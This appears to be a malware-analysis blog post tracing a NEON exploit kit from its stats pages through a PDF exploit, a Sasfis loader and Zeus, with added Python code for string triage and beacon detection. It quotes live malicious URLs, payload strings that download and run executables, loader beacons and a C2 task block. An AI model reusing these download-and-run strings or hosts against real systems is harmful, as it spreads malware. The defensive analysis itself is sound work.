Only two NEON exploit kits were specifically listed at malwaredomains.com. The other was:
Specifically, you can see that the first site, tomorrrrow.cn, uses the directory /difpack and the second site, sirius.mn, uses the directory /tuc. Some other Google queries for /difpack didn't turn up anything significant, so I'm thinking the directory name is probably a site-specific value. The only file in common was stat.php.
Screenshots were easy to obtain from the statistics page of the .cn site. The first page reveals browsers; some of these are likely to be researchers, but most are probably victims. IE6 was hit hardest (what a surprise).
Next up were operating system stats. XP, of course, was the largest. I was a bit surprised at Windows 2003 appearing as much as it did. I guess people are still surfing the web from their servers despite being warned against doing this since 1950. I haven't seen the back-end code, but I'm guessing that "Loads" means an actual exploit is loaded, or is successfully executed (I need to see the kit itself to understand how this is calculated; any researcher got the kit source? Drop me a line if so).
Countries - USA is the largest target/victim
Next up were the referrers. I didn't check these sites, but the stats show an infection trail (or, in some cases, obvious security/malware researchers poking about as you get further down the list). The actual URLs were not included here, so it's hard to know where in a site a redirect, IFRAME or other trickery is placed. In the case of the top referrer, www.bearmarketcentral.com, I see that they have a forum, and this seems like a likely location for trouble. Also troubling are several references to Grant Morrison, a fabulous comics creator.
Next up are the actual exploits used. Nothing too exciting here. All of these have been documented elsewhere at length, so I won't go into much detail, but one can see a typical array of Adobe Reader exploits, the older Microsoft MDAC bug, an IE 7 exploit and the Snapshot Viewer exploit. Despite MDAC being such an old bug, if Loads or Efficiency represents actual exploitation, it's higher than it should be, and is just another indication of unskilled computer users who are unfortunately easy prey.
An entry page to the site contains the common technique of serving obfuscated JavaScript.
This JavaScript could not be deobfuscated by Wepawet's sandbox for unknown reasons, and initial attempts at decoding in Malzilla also failed. I'm sure I could decode it if I spent a little time on it. It probably just points users to the various pages serving the actual exploit code.
Later analysis with Wepawet reveals one of these pages, serving the Acrobat Reader stack overflow/format string in util.printf PDF exploit (CVE-2008-2992) - (see http://wepawet.cs.ucsb.edu/view.php?hash=3cbe658f62c9324793b132178717e81a&t=1261673543&type=js for the full report)
http:// tomorrrrow.cn /difpack/cache/readme.pdf
The PDF exploit contains two payloads, both downloaded with the URLDownloadToFile function (I'm unsure what the string crash.php is doing) to the destination file pdfupd.exe. The first payload is targeted at http:// souzmov.cn /difpack/load.php?id=4,
URLDownloadToFileA.pdfupd.exe.crash.php.http://souzmov.cn/difpack/load.php?id=4
and the second payload targeted at http:// souzmov.cn /difpack/load.php?id=5
URLDownloadToFileA.pdfupd.exe.crash.php.http://souzmov.cn/difpack/load.php?id=5
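The two payload strings above are the kind of thing a quick static triage pulls out of a sample before any sandbox run. The following is an added example (my own code, not the kit's or any sandbox's) of that triage step: it walks a byte blob for printable, null-separated strings, pulls out the download API name, the drop filename and the load.php URLs, and defangs the URLs for a report. The payload bytes are a constructed stand-in modelled on the strings shown above, not the real readme.pdf.

```python
import re

# Constructed sample: null-separated strings in the same shape as the ones
# recovered from the readme.pdf payload above, padded with non-printable bytes.
SAMPLE_PAYLOAD = (
    b"\x90" * 8
    + b"URLDownloadToFileA\x00pdfupd.exe\x00crash.php\x00"
    + b"http://souzmov.cn/difpack/load.php?id=4\x00"
    + b"\x90" * 4
    + b"URLDownloadToFileA\x00pdfupd.exe\x00crash.php\x00"
    + b"http://souzmov.cn/difpack/load.php?id=5\x00"
)

URL_RE = re.compile(r"https?://[^\s\"'<>\x00]+")
# Win32 download APIs commonly seen in dropper shellcode (real API names).
DOWNLOAD_APIS = ("URLDownloadToFileA", "URLDownloadToFileW", "URLDownloadToCacheFileA")
DROP_EXTS = (".exe", ".dll", ".scr")


def extract_strings(blob, min_len=4):
    """Return runs of printable ASCII of at least min_len bytes, in file order."""
    pat = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.group().decode("ascii") for m in pat.finditer(blob)]


def triage(blob):
    """Summarise download-related indicators found in the blob's strings."""
    strings = extract_strings(blob)
    urls = []
    for s in strings:
        for u in URL_RE.findall(s):
            if u not in urls:          # keep first-seen order, drop duplicates
                urls.append(u)
    apis = sorted({s for s in strings if s in DOWNLOAD_APIS})
    dropped = sorted({s for s in strings if s.lower().endswith(DROP_EXTS)})
    return {"download_apis": apis, "urls": urls, "dropped_files": dropped}


def defang(url):
    """Render a URL safely for a report: http -> hxxp, dots in the host bracketed."""
    scheme, _, rest = url.partition("://")
    host, sep, path = rest.partition("/")
    return scheme.replace("http", "hxxp") + "://" + host.replace(".", "[.]") + sep + path


if __name__ == "__main__":
    report = triage(SAMPLE_PAYLOAD)
    print("APIs:", report["download_apis"])
    print("Dropped:", report["dropped_files"])
    for u in report["urls"]:
        print("URL:", defang(u))
```

The string scan is deliberately dumb (no PDF stream decoding), so on a real sample it should be run on the decompressed stream, or on the shellcode after the JavaScript has been decoded.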
Static AV coverage of the file delivered via load.php (which pushes load.exe) was very good: 37/41 (90.24%), with most detections naming the Sasfis trojan.
http://www.virustotal.com/analisis/31ca8b8422659f967627f4dd8c0f0b627509f1ada132159733d016edc7c97bfd-1261808607
http://www.threatexpert.com/report.aspx?md5=056346161d867c0944b4e15ec5bdda9c
The malware is also involved in Zeus installations; running load.exe does the following:
The following HTTP URLs were started reading:
http://tomorrrrow.cn/loader/bb.php?id=&v=200&tm=1&b=svyazka
http://tomorrrrow.cn/loader/bb.php?id=&v=200&tm=2&b=svyazka
http://tomorrrrow.cn/loader/bb.php?id=&v=200&tm=3&b=svyazka
Command data is apparently delivered via bb.php as such:
[info]runurl:http://spysystemcom.cn/gamedata2/game.exe|taskid:6|delay:20|upd:0|backurls:http://yesandns.cn/loader/[/info]
game.exe contains Zeus/Zbot. The "backurls" url did not resolve.
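For incident response it helps to turn the observed loader traffic into something that can be checked against proxy logs and parsed automatically. Below is an added example (my own code, not part of the original post or of any sandbox) that does two things: it parses the [info]...[/info] task block format shown above into a dictionary and pulls the C2 hosts out of it, and it flags bb.php beacons of the form seen above in proxy log lines. The task string mirrors the one quoted above; the proxy log lines and client IPs are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Task block in the shape returned by bb.php above (values as quoted in the post).
SAMPLE_TASK = (
    "[info]runurl:http://spysystemcom.cn/gamedata2/game.exe|taskid:6|delay:20"
    "|upd:0|backurls:http://yesandns.cn/loader/[/info]"
)

# Constructed proxy log: "<epoch> <client> <method> <url>" per line.
SAMPLE_PROXY_LOG = """\
1261808600 10.0.0.12 GET http://www.example.com/index.html
1261808601 10.0.0.12 GET http://tomorrrrow.cn/loader/bb.php?id=&v=200&tm=1&b=svyazka
1261808602 10.0.0.12 GET http://tomorrrrow.cn/loader/bb.php?id=&v=200&tm=2&b=svyazka
1261808640 10.0.0.33 GET http://spysystemcom.cn/gamedata2/res.bin
"""

TASK_BLOCK = re.compile(r"\[info\](.*?)\[/info\]", re.S)
INT_FIELDS = ("taskid", "delay", "upd")


def parse_task(text):
    """Parse one [info]key:value|key:value[/info] block; None if no block present."""
    m = TASK_BLOCK.search(text)
    if not m:
        return None
    task = {}
    for field in m.group(1).split("|"):
        key, sep, value = field.partition(":")   # split on the FIRST colon only,
        if sep:                                  # so http:// in values survives
            task[key] = value
    for k in INT_FIELDS:
        if task.get(k, "").isdigit():
            task[k] = int(task[k])
    return task


def task_hosts(task):
    """Hostnames referenced by the task (download URL and fallback URLs)."""
    hosts = []
    for key in ("runurl", "backurls"):
        for url in task.get(key, "").split(","):
            host = urlsplit(url.strip()).hostname
            if host and host not in hosts:
                hosts.append(host)
    return hosts


def is_loader_beacon(url):
    """True for bb.php requests carrying the v/tm/b=svyazka query seen above."""
    parts = urlsplit(url)
    if not parts.path.endswith("/bb.php"):
        return False
    q = parse_qs(parts.query, keep_blank_values=True)
    return "v" in q and "tm" in q and q.get("b") == ["svyazka"]


def find_beacons(log_text):
    """Return (client, url) pairs for log lines that look like loader beacons."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue
        _ts, client, _method, url = fields[:4]
        if is_loader_beacon(url):
            hits.append((client, url))
    return hits


if __name__ == "__main__":
    task = parse_task(SAMPLE_TASK)
    print("task:", task)
    print("C2 hosts:", task_hosts(task))
    for client, url in find_beacons(SAMPLE_PROXY_LOG):
        print("beacon from", client, "->", url)
```

The beacon check keys on the path and the query parameter shape rather than on the hostname, so it still fires if the loader domain rotates but the kit's URL scheme stays the same; the hostnames from the task block are what you would feed into a DNS/proxy block list.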
The ThreatExpert report for Zeus (game.exe) has new (to me) functionality that apparently parses the list of target domains that is normally contained in the zeus config file (cfg.bin is a filename I've often seen). This is a nice feature that's a time saver in an incident response situation.
Check out the useful and informative ThreatExpert report, which includes a list of the targeted financial institutions, a very nice addition to ThreatExpert that I don't recall seeing before.
http://www.threatexpert.com/report.aspx?md5=1f22afba0880113d30ac80fef64eac1e
MD5 = 0x01605D291B427C8564E7E13CDEEA1AE9
The first five financial institutions are listed as such:
* https://www.gruposantander.es
* http://*odnoklassniki.ru
* http://vkontakte.ru
* https://banking.*.de
* https://internetbanking.gad.de
* https://www.citibank.de
I found it interesting that a mutex named _AVIRA_21099 was created. This may be documented in other much more deep analysis but I don't recall.
The Zeus/Zbot config file is obtained from http://spysystemcom.cn/gamedata2/res.bin
Trying to reverse engineer this malware myself, even with dynamic analysis, would take far longer than what ThreatExpert offers. Sure, sandboxes have been evaded and are not perfect, but what a huge time-saver. I offer my thanks to the creators and maintainers of Wepawet, ThreatExpert, Anubis, VirusTotal and other sandboxes.
http://images.google.nl/images?q=directadmin%20logo direct admins old logo